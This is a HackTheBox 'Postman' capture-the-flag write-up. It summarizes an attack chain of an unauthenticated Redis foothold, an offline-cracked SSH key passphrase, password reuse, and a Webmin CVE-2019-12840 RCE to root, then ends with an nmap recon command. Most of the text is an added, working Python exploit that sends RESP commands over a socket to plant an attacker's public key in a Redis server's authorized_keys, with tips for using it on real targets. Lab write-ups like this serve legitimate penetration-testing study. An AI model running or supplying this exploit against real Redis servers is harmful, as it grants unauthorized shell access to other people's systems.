Summary

Postman is an easy-rated Linux machine on HackTheBox. The box exposes an unauthenticated Redis instance; abusing CONFIG SET and SAVE to dump a crafted value into the redis user's .ssh/authorized_keys grants an initial SSH shell as redis. From there, an encrypted RSA private key belonging to the user Matt is recovered and its passphrase cracked offline with John the Ripper; because Matt reused that passphrase as his login password, su yields a shell as Matt and the user flag. Enumerating files owned by Matt points to the Webmin service on port 10000, which had not yet been examined; the same reused password grants admin access to Webmin 1.910, vulnerable to CVE-2019-12840 (an authenticated RCE via the Package Updates module), which leads to a root shell.
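The Redis foothold described above depends on four commands: repoint Redis's working directory at the target .ssh directory, rename its dump file to authorized_keys, store a padded public key as a value, and SAVE so the RDB file is written to disk. The following is an added example, not code from the original write-up, that builds those commands in Redis's wire protocol (RESP, the same bytes redis-cli sends) and optionally delivers them over a raw socket. The sample public key, the `crackit` key name, the host/port arguments and the default `/var/lib/redis/.ssh` path are assumptions for the demo; the newline padding is needed because the RDB header and trailer are written around the value, and sshd skips lines in authorized_keys it cannot parse.

```python
import socket

# Constructed sample key for the demo only; replace with your own id_ed25519.pub.
SAMPLE_PUBKEY = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKeyMaterialOnlyForDemo attacker@kali"


def resp_encode(*args: str) -> bytes:
    """Encode one command as a RESP array of bulk strings (what redis-cli puts on the wire)."""
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        b = a.encode()
        out.append(f"${len(b)}\r\n".encode() + b + b"\r\n")
    return b"".join(out)


def padded_key(pubkey: str) -> str:
    """Surround the key with blank lines so the binary RDB header/trailer that
    Redis writes around the value land on their own lines; sshd ignores lines
    in authorized_keys it cannot parse, so the key line still loads."""
    return "\n\n" + pubkey.strip() + "\n\n"


def build_attack(pubkey: str, ssh_dir: str = "/var/lib/redis/.ssh") -> list:
    """The four commands of the authorized_keys write, in order (assumed key name 'crackit')."""
    return [
        resp_encode("CONFIG", "SET", "dir", ssh_dir),
        resp_encode("CONFIG", "SET", "dbfilename", "authorized_keys"),
        resp_encode("SET", "crackit", padded_key(pubkey)),
        resp_encode("SAVE"),
    ]


def deliver(host: str, pubkey: str = SAMPLE_PUBKEY, port: int = 6379, timeout: float = 5.0) -> list:
    """Send the commands to an unauthenticated Redis and return the raw reply lines.
    Every reply should be '+OK'; anything else means the write did not happen."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        for cmd in build_attack(pubkey):
            s.sendall(cmd)
            replies.append(s.recv(1024).decode(errors="replace").strip())
    return replies


def all_ok(replies) -> bool:
    """True only if all four steps were acknowledged with +OK."""
    return len(replies) == 4 and all(r == "+OK" for r in replies)


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        # No target given: just show the bytes that would be sent.
        for cmd in build_attack(SAMPLE_PUBKEY):
            print(cmd)
    else:
        replies = deliver(sys.argv[1], SAMPLE_PUBKEY)
        print(replies, "OK" if all_ok(replies) else "FAILED")
```

Two practical checks before running this against a real target: the .ssh directory must already exist and be writable by the redis process (CONFIG SET dir fails with an error otherwise), and the technique permanently changes the instance's persisted dir and dbfilename and clobbers any existing authorized_keys, so on an engagement note the original values from CONFIG GET first.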

Recon

nmap -sC -sV -p- -A <MACHINE-IP> -oA nmap
